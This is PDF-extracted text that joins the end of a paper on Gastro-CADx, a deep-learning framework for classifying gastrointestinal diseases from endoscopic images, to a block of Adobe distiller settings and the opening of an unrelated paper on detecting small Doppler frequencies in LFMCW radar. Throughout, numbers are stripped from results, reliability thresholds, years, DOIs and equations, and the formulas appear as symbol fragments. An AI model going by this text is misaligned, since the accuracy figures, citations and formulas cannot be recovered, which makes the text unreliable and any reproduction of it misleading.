gf+lbp +haralick+lr . . . . . thambawita et al. ( ) gf+cnn . . . . . owais et al. ( ) resnet+densenet+mlp . . . – . gastro-cadx . . . . . notes: global features. logistic model tree. local binary pattern. logistic regression. multilayer perceptron. attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gastro-cadx. this is because gastro-cadx considered the fusion of two types of textural features while reducing the feature space. dataset ii is a new dataset for gi disease that was just released in . therefore, there is still no research articles to compare with. for this reason, we only compared with the resnet- cnn used in borgli et al. ( ) as well as the other three cnns employed in experiment i of gastro-cadx and illustrated in table . the results of gasto-cadx shown in table verifies its competence. it outperformed the classification accuracy achieved by resnet- used in borgli et al. ( ). gastro-cadx has also better performance than the classification accuracy achieved by alexnet, densenet- , and darknet- cnns. this is because gastro-cadx extracted not only spatial features but temporal-frequency and spatial-frequency features. it also used dct and dwt not only for feature extractors but also for feature reduction methods. moreover, it fuzes these several reduced t features to enhance the performance of the cadx. the three stages of gatro-cadx based on deep cnns, dct, and dwt showed the best performance with the highest accuracies of . % and . % for dataset i and dataset ii respectively. the following article (attallah, ; colquhoun, ), that that the reliability of a medical system requires that the sensitivity should be greater than or equivalent to %, the specificity is greater or equivalent to %, and the precision is more or equivalent to %. the specificities, sensitivities, and precision shown in table are all larger than %, therefore gastro-cadx can be considered a reliable system. this remarkable reliability and performance of gastro-cadx rises its usability in the diagnosis of several gi diseases by automatically detecting several types of gi lesions or anomalies. our ai-based gastro-cadx framework can help the medical experts in an effective diagnosis of several complex gi diseases. furthermore, it may assist gastroenterologists in reaching a more accurate diagnosis whereas reducing examination time. the proposed system can be used to decrease medical obstacles, death-rates in addition to the cost of treatment. conclusion this article introduced a cadx system called gastro-cadx for the automatic classification of gi diseases based on dl techniques. gastro-cadx consist of three stages. the first stage is based on dl feature extraction techniques to extract spatial information from endoscopic images. the second stage extracted some temporal-frequency and spatial-frequency features. the feature reduction procedure is also considered in this stage. table comparisons with studies based on dataset ii. method accuracy (%) alexnet . resnet- (borgli et al., ) . darknet- . densenet- . gastro-cadx . attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the third stage is a feature fusion based process where several features sets extracted in the second stage are fuzed to form numerous combinations of fuzed features. the results of the three stages of gastro-cadx verified that the proposed system was capable of accurately classifying gi diseases. the first stage of gastro-cadx achieved higher accuracy than that of end to end dl cnns. moreover, the results of the second stage of gastro-cadx indicated that using the temporal-frequency and spatial-frequency has a better performance compared to using only spatial features. besides, the second stage of gastro-cadx achieved competitive performance to the first stage with a lower dimension of features. also, the third stage has further improvement in the performance of gastro-cadx which indicated that feature fusion had a significant impact on the accuracy of classification. the performance of the gastro-cadx is competitive with recent related work based on the same dataset. this means the proposed method can be used efficiently for the diagnosis and classification of gi diseases. consequently, the cost of medical investigations, medical complications, and death-rates will be reduced. moreover, the quality of diagnosis will be enhanced as well as the accuracy. future work will focus on combining multiple datasets to form a multicenter study. besides, exploring more cnns and more handcrafted feature extraction methods. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � omneya attallah conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � maha sharkas performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the kvasir dataset (kvasir-datasetv ) is available at pogorelov et al. ( ) and simula: https://datasets.simula.no/kvasir/. the hyperkavasir dataset (labeled images) is also available at borgli et al. ( ) (doi . /osf.io/mkzcq) and simula: https://datasets.simula.no/hyper-kvasir/. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / https://datasets.simula.no/kvasir/ http://dx.doi.org/ . /osf.io/mkzcq https://datasets.simula.no/hyper-kvasir/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ references agrawal t, gupta r, sahu s, espy-wilson cy. . scl-umd at the medico task-mediaeval : transfer learning based classification of medical images. in: mediaeval. ahmad j, muhammad k, lee my, baik sw. . endoscopic image classification and retrieval using clustered convolutional features. journal of medical systems ( ): doi . /s - - -y. alaskar h, hussain a, al-aseem n, liatsis p, al-jumeily d. . application of convolutional neural networks for automated ulcer detection in wireless capsule endoscopy images. sensors ( ): doi . /s . ali h, sharif m, yasmin m, rehmani mh, riaz f. . a survey of feature extraction and fusion of deep learning for detection of abnormalities in video endoscopy of gastrointestinal-tract. artificial intelligence review ( ): – doi . /s - - - . anthimopoulos m, christodoulidis s, christe a, mougiakakou s. . classification of interstitial lung disease patterns using local dct features and random forest. in: th annual international conference of the ieee engineering in medicine and biology society. piscataway: ieee, – . aoki t, yamada a, aoyama k, saito h, tsuboi a, nakada a, niikura r, fujishiro m, oka s, ishihara s. . automatic detection of erosions and ulcerations in wireless capsule endoscopy images based on a deep convolutional neural network. gastrointestinal endoscopy ( ): – doi . /j.gie. . . . anwar f, attallah o, ghanem n, ismail ma. . automatic breast cancer classification from histopathological images. in: international conference on advances in the emerging computing technologies (aect). piscataway: ieee, – . attallah o. . an effective mental stress state detection and evaluation system using minimum number of frontal brain electrodes. diagnostics ( ): – doi . /diagnostics . attallah o. . mb-ai-his: histopathological diagnosis of pediatric medulloblastoma and its subtypes via ai. diagnostics : . attallah o, karthikesalingam a, holt pj, thompson mm, sayers r, bown mj, choke ec, ma x. a. feature selection through validation and un-censoring of endovascular repair survival data for predicting the risk of re-intervention. bmc medical informatics and decision making ( ): – doi . /s - - - . attallah o, karthikesalingam a, holt pj, thompson mm, sayers r, bown mj, choke ec, ma x. b. using multiple classifiers for predicting the risk of endovascular aortic aneurysm repair re-intervention through hybrid feature selection. proceedings of the institution of mechanical engineers, part h: journal of engineering in medicine ( ): – doi . / . attallah o, ragab da, sharkas m. . multi-deep: a novel cad system for coronavirus (covid- ) diagnosis from ct images using multiple convolution neural networks. peerj ( ):e doi . /peerj. . attallah o, sharkas ma, gadelkarim h. . fetal brain abnormality classification from mri images of different gestational age. brain sciences ( ): – doi . /brainsci . attallah o, sharkas ma, gadelkarim h. . deep learning techniques for automatic detection of embryonic neurodevelopmental disorders. diagnostics ( ): – doi . /diagnostics . attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.gie. . . http://dx.doi.org/ . /diagnostics http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /brainsci http://dx.doi.org/ . /diagnostics http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ aydoğdu Ö, ekinci m. . an approach for streaming data feature extraction based on discrete cosine transform and particle swarm optimization. symmetry ( ): doi . /sym . benhassine ne, boukaache a, boudjehem d. . medical image classification using the discriminant power analysis (dpa) of discrete cosine transform (dct) coefficients. in: real perspective of fourier transforms. intechopen. bennet j, arul ganaprakasam c, arputharaj k. . a discrete wavelet based feature extraction and hybrid classification technique for microarray data analysis. scientific world journal : – doi . / / . bi z, yu l, gao h, zhou p, yao h. . improved vgg model-based efficient traffic sign recognition for safe driving in g scenarios. epub ahead of print august . international journal of machine learning and cybernetics doi . /s - - - . billah m, waheed s, rahman mm. . an automatic gastrointestinal polyp detection system in video endoscopy using fusion of color wavelet and convolutional neural network features. international journal of biomedical imaging ( ): – doi . / / . borgli h, thambawita v, smedsrud ph, hicks s, jha d, eskeland sl, randel kr, pogorelov k, lux m, nguyen dtd. . hyperkvasir, a comprehensive multi-class image and video dataset for gastrointestinal endoscopy. scientific data ( ): – doi . /s - - -y. castellano g, bonilha l, li lm, cendes f. . texture analysis of medical images. clinical radiology : – doi . /j.crad. . . . colquhoun d. . an investigation of the false discovery rate and the misinterpretation of p-values. royal society open science ( ): doi . /rsos. . dabbaghchian s, ghaemmaghami mp, aghagolzadeh a. . feature extraction using discrete cosine transform and discrimination power analysis with a face recognition technology. pattern recognition ( ): – doi . /j.patcog. . . . das d, mahanta lb, baishya bk, ahmed s. . classification of childhood medulloblastoma and its subtypes using transfer learning features: a comparative study of deep convolutional neural networks. in: international conference on computer, electrical & communication engineering (iccece). piscataway: ieee, – . deeba f, islam m, bui fm, wahid ka. . performance assessment of a bleeding detection algorithm for endoscopic video based on classifier fusion method and exhaustive feature selection. biomedical signal processing and control ( ): – doi . /j.bspc. . . . du w, rao n, liu d, jiang h, luo c, li z, gan t, zeng b. . review on the applications of deep learning in the analysis of gastrointestinal endoscopy images. ieee access : – doi . /access. . . ertosun mg, rubin dl. . probabilistic visual search for masses within mammography images using deep learning. in: ieee international conference on bioinformatics and biomedicine (bibm). piscataway: ieee, – . fan s, xu l, fan y, wei k, li l. . computer-aided detection of small intestinal ulcer and erosion in wireless capsule endoscopy images. physics in medicine & biology ( ): doi . / - /aad c. ghatwary n, ye x, zolgharni m. . esophageal abnormality detection using densenet based faster r-cnn with gabor features. ieee access : – doi . /access. . . ghatwary n, zolgharni m, ye x. . early esophageal adenocarcinoma detection using deep learning methods. international journal of computer assisted radiology and surgery ( ): – doi . /s - - - . attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /sym http://dx.doi.org/ . / / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / / http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /j.crad. . . http://dx.doi.org/ . /rsos. http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /j.bspc. . . http://dx.doi.org/ . /access. . http://dx.doi.org/ . / - /aad c http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ghosh t, fattah sa, wahid ka. . chobs: color histogram of block statistics for automatic bleeding detection in wireless capsule endoscopy video. ieee journal of translational engineering in health and medicine : – doi . /jtehm. . . hamashima c, shabana m, okada k, okamoto m, osaki y. . mortality reduction from gastric cancer by endoscopic and radiographic screening. cancer science ( ): – doi . /cas. . he j-y, wu x, jiang y-g, peng q, jain r. . hookworm detection in wireless capsule endoscopy images with deep learning. ieee transactions on image processing ( ): – doi . /tip. . . he k, zhang x, ren s, sun j. . deep residual learning for image recognition. ieee conference on computer vision and pattern recognition – doi . /cvpr. . . huang g, liu z, van der maaten l, weinberger kq. . densely connected convolutional networks. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . igarashi s, sasaki y, mikami t, sakuraba h, fukuda s. . anatomical classification of upper gastrointestinal organs under various image capture conditions using alexnet. computers in biology and medicine ( ): doi . /j.compbiomed. . . imtiaz h, fattah sa. . a dct-based feature extraction algorithm for palm-print recognition. in: international conference on communication control and computing technologies. piscataway: ieee, – . jin s, wang b, xu h, luo c, wei l, zhao w, hou x, ma w, xu z, zheng z. . ai-assisted ct imaging analysis for covid- screening: building and deploying a medical ai system in four weeks. medrxiv doi . / . . . . kainuma m, furusyo n, urita y, nagata m, ihara t, oji t, nakaguchi t, namiki t, hayashi j. . the association between objective tongue color and endoscopic findings: results from the kyushu and okinawa population study (kops). bmc complementary and alternative medicine ( ): doi . /s - - - . karargyris a, bourbakis n. . detection of small bowel polyps and ulcers in wireless capsule endoscopy videos. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . khan ma, kadry s, alhaisoni m, nam y, zhang y, rajinikanth v, sarfraz ms. a. computer-aided gastrointestinal diseases analysis from wireless capsule endoscopy: a framework of best features selection. ieee access : – doi . /access. . . khan ma, khan ma, ahmed f, mittal m, goyal lm, hemanth dj, satapathy sc. b. gastrointestinal diseases segmentation and classification based on duo-deep architectures. pattern recognition letters : – doi . /j.patrec. . . . khan ma, rashid m, sharif m, javed k, akram t. . classification of gastrointestinal diseases of stomach from wce using improved saliency-based method and discriminant features selection. multimedia tools and applications ( ): – doi . /s - - - . kim d, cho h, cho h. . gastric lesion classification using deep learning based on fast and robust fuzzy c-means and simple linear iterative clustering superpixel algorithms. journal of electrical engineering & technology ( ): – doi . /s - - -x. krizhevsky a, sutskever i, hinton ge. . imagenet classification with deep convolutional neural networks. in: advances in neural information processing systems, – . attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /jtehm. . http://dx.doi.org/ . /cas. http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . /j.compbiomed. . http://dx.doi.org/ . / . . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lahmiri s, boukadoum m. . hybrid discrete wavelet transform and gabor filter banks processing for features extraction from biomedical images. journal of medical engineering ( ): – doi . / / . lee jh, kim yj, kim yw, park s, choi y, kim yj, park dk, kim kg, chung j-w. . spotting malignancies from gastric endoscopic images using deep learning. surgical endoscopy ( ): – doi . /s - - - . leng j, li t, bai g, dong q, dong h. . cube-cnn-svm: a novel hyperspectral image classification method. in: ieee th international conference on tools with artificial intelligence (ictai). piscataway: ieee, – . li b, meng mq-h. a. automatic polyp detection for wireless capsule endoscopy images. expert systems with applications ( ): – doi . /j.eswa. . . . li b, meng mq-h. b. tumor recognition in wireless capsule endoscopy images using textural features and svm-based feature selection. ieee transactions on information technology in biomedicine ( ): – doi . /titb. . . majid a, khan ma, yasmin m, rehman a, yousafzai a, tariq u. . classification of stomach infections: a paradigm of convolutional neural network along with classical features fusion and selection. microscopy research and technique ( ): – doi . /jemt. . mishra s, sharma l, majhi b, sa pk. . microscopic image classification using dct for the detection of acute lymphoblastic leukemia (all). in: proceedings of international conference on computer vision and image processing. singapore: springer, – . nguyen dt, lee mb, pham td, batchuluun g, arsalan m, park kr. . enhanced image-based endoscopic pathological site classification using an ensemble of deep learning models. sensors : . jadoon mm, zhang q, haq iu, butt s, jadoon a. . three-class mammogram classification based on descriptive cnn features. hindawi biomed research international : doi . / / . nadeem s, tahir ma, naqvi ssa, zaid m. . ensemble of texture and deep learning features for finding abnormalities in the gastro-intestinal tract. in: international conference on computational collective intelligence, springer, – . owais m, arsalan m, choi j, mahmood t, park kr. . artificial intelligence-based classification of multiple gastrointestinal diseases using endoscopy videos for clinical diagnosis. journal of clinical medicine ( ): doi . /jcm . owais m, arsalan m, mahmood t, kang jk, park kr. . automated diagnosis of various gastrointestinal lesions using a deep learning–based classification and retrieval framework with a large endoscopic database: model development and validation. journal of medical internet research :e . pei m, wu x, guo y, fujita h. . small bowel motility assessment based on fully convolutional networks and long short-term memory. knowledge-based systems ( ): – doi . /j.knosys. . . . pogorelov k, randel kr, griwodz c, eskeland sl, de lange t, johansen d, spampinato c, dang-nguyen d-t, lux m, schmidt pt. . kvasir: a multi-class image dataset for computer aided gastrointestinal disease detection. in: proceedings of the th acm on multimedia systems conference. new york: acm, – . ragab da, attallah o. . fusi-cad: coronavirus (covid- ) diagnosis based on the fusion of cnns and handcrafted features. peerj computer science ( ):e doi . /peerj-cs. . attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /titb. . http://dx.doi.org/ . /jemt. http://dx.doi.org/ . / / http://dx.doi.org/ . /jcm http://dx.doi.org/ . /j.knosys. . . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ragab da, sharkas m, attallah o. . breast cancer diagnosis using an efficient cad system based on multiple classifiers. diagnostics ( ): – doi . /diagnostics . ragab da, sharkas m, marshall s, ren j. . breast cancer detection using deep convolutional neural networks and support vector machines. peerj ( ):e doi . /peerj. . rashidi s, fallah a, towhidkhah f. . feature extraction based dct on dynamic signature verification. scientia iranica ( ): – doi . /j.scient. . . . ravì d, wong c, deligianni f, berthelot m, andreu-perez j, lo b, yang g-z. . deep learning for health informatics. ieee journal of biomedical and health informatics : – . redmon j, farhadi a. . yolo : better, faster, stronger. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . sampaio wb, diniz em, silva ac, de paiva ac, gattass m. . detection of masses in mammogram images using cnn, geostatistic functions and svm. computers in biology and medicine ( ): – doi . /j.compbiomed. . . . sharif m, attique khan m, rashid m, yasmin m, afza f, tanik uj. . deep cnn and geometric features-based gastrointestinal tract diseases detection and classification from wireless capsule endoscopy images. journal of experimental & theoretical artificial intelligence – . shi q, li w, zhang f, hu w, sun x, gao l. . deep cnn with multi-scale rotation invariance features for ship classification. ieee access : – doi . /access. . . srivastava v, purwar rk. . a five-level wavelet decomposition and dimensional reduction approach for feature extraction and classification of mr and ct scan images. applied computational intelligence and soft computing ( ): – doi . / / . su d, li y, zhao y, xu r, yuan b, wu w. . a face recognition algorithm based on dual-channel images and vgg-cut model. journal of physics: conference series : . talo m, baloglu ub, yıldırım Ö, acharya ur. . application of deep transfer learning for automated brain abnormality classification using mr images. cognitive systems research (c): – doi . /j.cogsys. . . . thai lh, hai ts, thuy nt. . image classification using support vector machine and artificial neural network. international journal of information technology and computer science ( ): – doi . /ijitcs. . . . thambawita v, jha d, riegler m, halvorsen p, hammer hl, johansen hd, johansen d. . the medico-task : disease detection in the gastrointestinal tract using global features and deep learning. arxiv preprint arxiv: . . wang r, xu j, han tx. . object instance detection with pruned alexnet and extended training data. signal processing: image communication ( ): – doi . /j.image. . . . wu h, huang q, wang d, gao l. . a cnn-svm combined model for pattern recognition of knee motion using mechanomyography signals. journal of electromyography and kinesiology ( ): – doi . /j.jelekin. . . . xue d-x, zhang r, feng h, wang y-l. . cnn-svm for microvascular morphological type recognition with data augmentation. journal of medical and biological engineering ( ): – doi . /s - - - . yuan y, li b, meng mq-h. . improved bag of feature for automatic polyp detection in wireless capsule endoscopy images. ieee transactions on automation science and engineering ( ): – doi . /tase. . . attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /diagnostics http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /j.scient. . . http://dx.doi.org/ . /j.compbiomed. . . http://dx.doi.org/ . /access. . http://dx.doi.org/ . / / http://dx.doi.org/ . /j.cogsys. . . http://dx.doi.org/ . /ijitcs. . . http://dx.doi.org/ . /j.image. . . http://dx.doi.org/ . /j.jelekin. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tase. . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. yuan y, meng mq-h. . polyp classification based on bag of features and saliency in wireless capsule endoscopy. in: ieee international conference on robotics and automation (icra). piscataway: ieee, – . yuan y, meng mq-h. . deep learning for polyp recognition in wireless capsule endoscopy images. medical physics ( ): – doi . /mp. . zhang h, wu r, yuan t, jiang z, huang s, wu j, hua j, niu z, ji d. . de-ada*: a novel model for breast mass classification using cross-modal pathological semantic mining and organic integration of multi-feature fusions. information sciences ( – ): – doi . /j.ins. . . . attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /mp. http://dx.doi.org/ . /j.ins. . . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. gastro-cadx: a three stages framework for diagnosing gastrointestinal diseases introduction materials and methods experimental setup evaluation performance results discussion conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice enhancement of small doppler frequencies detection for lfmcw radar enhancement of small doppler frequencies detection for lfmcw radar sameh ghanem electronics and communications, egyptian academy for engineering and advanced technology (eaeat), cairo, al qahirah, egypt abstract detection of targets with small doppler frequencies of linear-frequency modulated continuous wave radars is the main task of this article. the moving target indicator (mti) is used to reject the fixed targets and high-speed targets through the radar research area. in this work, targets with small doppler frequencies can be detected perfectly based on the frequency response of a single delay line canceller followed by single delay line integrator. an enhancement of the proposed algorithm is achieved using a filter in the range direction of the range-doppler processor scheme. the proposed filter is chosen with certain coefficients after the first fast fourier transform processor in range to enhance the radar performance. the evaluation of the proposed algorithm is achieved at different slow doppler scenarios of the target and compared with the traditional algorithm which uses only mti processor. another aspect that is important for evaluation of the proposed algorithm is the detection performance of the algorithms through the receiver operating characteristic curves. implementation of the proposed algorithm using fpga is performed in real time applications and it is found that it meets the simulation results. subjects adaptive and self-organizing systems, algorithms and analysis of algorithms, digital libraries, optimization theory and computation keywords lfmcw radar, sdlc–mti, doppler frequency, d-fft, signal processing introduction detection of slow moving targets is an important for linear-frequency modulated continuous wave (lfmcw) radars based on traditional techniques such as fast fourier transform (fft) in both range and doppler directions (skolnik, ). usage of fmcw radar due to many advantages such as its small weight, small energy consumption and less hardware complexity relative to other radars (lee & kim, ). the target information such as range and speed can be extracted from lfmcw radars using two- dimensional fft algorithm. the moving target indicator (mti) is used to distinguish between the fixed and moving targets. there are many researches that enhance the detection of lfmcw radars using different techniques. in salem et al. ( ), target detection of lfmcw radars is enhanced using compressive sensing theory in doppler direction. in salem et al. ( ), the authors investigate the real time implementation of the proposed algorithm for lfmcw radar. an enhancement of target detection in both range and doppler directions based on cs is shown in hossiny et al. ( ). in ahmed ( ), the author enhances the detection of slow doppler frequencies based on frequency response of both the single delay line canceller (sdlc) and integrator. the authors in how to cite this article ghanem s. . enhancement of small doppler frequencies detection for lfmcw radar. peerj comput. sci. : e doi . /peerj-cs. submitted october accepted december published january corresponding author sameh ghanem, samehghanem@eaeat.edu.eg academic editor tawfik al-hadhrami additional information and declarations can be found on page doi . /peerj-cs. copyright ghanem distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:samehghanem@�eaeat.�edu.�eg https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ winkler ( ), achievement of range-doppler detection of automotive fmcw radar is performed to extract the target information based on fft calculations. in this article, an enhancement of small doppler target detection is achieved using a proposed filter in range direction of fft processor. the evaluation of the proposed processor has performed using matlab simulation and receiver operating characteristic (roc) curves. implementation of the proposed processor is designed and tested using fpga. the organization of this paper is achieved as follows; after the introduction, “lfmcw radar detection and processing” introduces a review on lfmcw radar processing and detection. “the proposed processor” illustrates on the operation of the proposed processor. experimental results using matlab is illustrated in “computer simulation”. “hardware implmentation” presents the hardware implementation of the proposed processor using fpga. finally, the conclusion comes in “conclusion”. lfmcw radar detection and processing the general block diagram of lfmcw radar is shown as in fig. . it consists of a transmitter, a receiver, mixer, and analog-to-digital converter (a/d). the received radar signal is processed after digitization using a/d converter in the form of base band signal. the target decision is made using the constant false alarm rate (cfar) algorithm after range-doppler processing based on fft. the transmitted signal of an fmcw radar can be modulated as follow (levanon & mozeson, ): st tð Þ ¼ atcos pfct þ p zt ft tð Þdt @ a ( ) where ft tð Þ ¼ bt :t is the linear transmitted frequency as function of time, fc is the carrier frequency, b is the bandwidth, at is the transmitted signal amplitude, and t is the time duration. the received signal after reflection with delay of td ¼ : roþvtc and doppler shift of fd ¼ � : fcvc , the received frequency can be expressed as: fr tð Þ ¼ b t t � tdð Þ þ fd ( ) where ro is the initial target range and v is the target velocity. figure general block diagram of lfmcw radar. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the received radar signal can be expressed as: sr tð Þ ¼ arcos � pfc t � tdð Þ þ p zt fr tð Þdt � ¼ arcos pfc t � tdð Þ þ b t t � td:t � � þ fd:t � � ( ) where ar represents the received signal amplitude. the target information can be obtained by mixing the transmitted and received signals in time domain and filtered using low-pass filter (lpf) to generate the intermediate frequency (if) signal sif(t) as: sif tð Þ ¼ cos p fc : ro c � � þ p � ro c : b t þ fcv c � � t � � ( ) the sign ± represents up and down 